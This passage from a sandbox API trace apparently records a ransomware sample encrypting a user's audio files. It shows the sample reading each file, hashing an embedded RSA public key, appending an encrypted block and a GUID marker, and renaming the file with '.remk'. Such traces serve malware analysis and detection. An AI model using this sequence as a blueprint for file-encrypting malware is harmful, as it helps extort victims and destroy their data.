Size=0xee) returned 0x31a4298 [0235.509] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.509] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\j1d_K7qJp6wY.wav") returned=".wav" [0235.509] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\j1d_K7qJp6wY.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\-wyl9wxaf_fqlu8drqb5\\j1d_k7qjp6wy.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.509] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=30951) returned 1 [0235.509] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.512] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x78c1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.512] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.513] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.513] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.513] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.514] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x78e7, lpOverlapped=0x0) returned 1 [0235.514] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0235.514] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.514] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.514] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0235.515] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.515] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.516] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0235.516] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.516] GetLastError () returned 0x0 [0235.516] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.516] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0235.516] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0235.516] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.516] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.516] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.516] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x78f0) returned 0x37c6278 [0235.516] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0235.516] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0235.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0235.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0235.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0235.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325cda0 [0235.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc420 [0235.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325cde8 [0235.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc438 [0235.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc450 [0235.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc468 [0235.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc480 [0235.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0235.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0235.517] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0235.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0235.517] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc450 | out: hHeap=0x630000) returned 1 [0235.517] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc480 | out: hHeap=0x630000) returned 1 [0235.517] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc468 | out: hHeap=0x630000) returned 1 [0235.517] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0235.517] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc468 [0235.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0235.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc480 [0235.518] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0235.518] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc450 [0235.518] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0235.518] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0235.518] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0235.518] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0235.518] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0235.518] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0235.518] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0235.518] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0235.518] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.518] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc480 | out: hHeap=0x630000) returned 1 [0235.518] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0235.518] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc450 | out: hHeap=0x630000) returned 1 [0235.518] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0235.518] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.518] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc468 | out: hHeap=0x630000) returned 1 [0235.518] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0235.518] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0235.518] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0235.518] GetCurrentThreadId () returned 0x314 [0235.518] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0235.518] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c48c0 [0235.518] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0235.518] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0235.518] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0235.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0235.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0235.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0235.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.519] GetCurrentThreadId () returned 0x314 [0235.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0235.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0235.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0235.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0235.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0235.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0235.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc468 [0235.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0235.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0235.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0235.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0235.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0235.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0235.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc450 [0235.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0235.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0235.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0235.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0235.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc480 [0235.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0235.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0235.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0235.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc498 [0235.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0235.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc4b0 [0235.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.521] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x78e7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.521] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.521] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.521] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.521] CloseHandle (hObject=0x640) returned 1 [0235.523] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\j1d_K7qJp6wY.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\-wyl9wxaf_fqlu8drqb5\\j1d_k7qjp6wy.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\j1d_K7qJp6wY.wav.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\-wyl9wxaf_fqlu8drqb5\\j1d_k7qjp6wy.wav.remk")) returned 1 [0235.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0235.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.524] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0235.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0235.525] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe025f7f0, ftCreationTime.dwHighDateTime=0x1d5db7c, ftLastAccessTime.dwLowDateTime=0x65f00400, ftLastAccessTime.dwHighDateTime=0x1d5dab2, ftLastWriteTime.dwLowDateTime=0x65f00400, ftLastWriteTime.dwHighDateTime=0x1d5dab2, nFileSizeHigh=0x0, nFileSizeLow=0x10dfb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="P0oF.mp3", cAlternateFileName="")) returned 1 [0235.525] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\P0oF.mp3") returned=".mp3" [0235.525] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\P0oF.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\-wyl9wxaf_fqlu8drqb5\\p0of.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.525] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=69115) returned 1 [0235.525] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.528] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x10dd5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.528] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.529] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.529] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x10dfb, lpOverlapped=0x0) returned 1 [0235.530] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.530] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.530] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.530] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0235.531] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.531] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.531] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.531] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.531] GetLastError () returned 0x0 [0235.531] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.531] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0235.531] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0235.532] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.532] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.532] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.532] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.532] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.532] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e00) returned 0x37c6278 [0235.532] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0235.532] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0235.532] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0235.533] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x10dfb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.533] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.533] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.533] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.533] CloseHandle (hObject=0x640) returned 1 [0235.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, 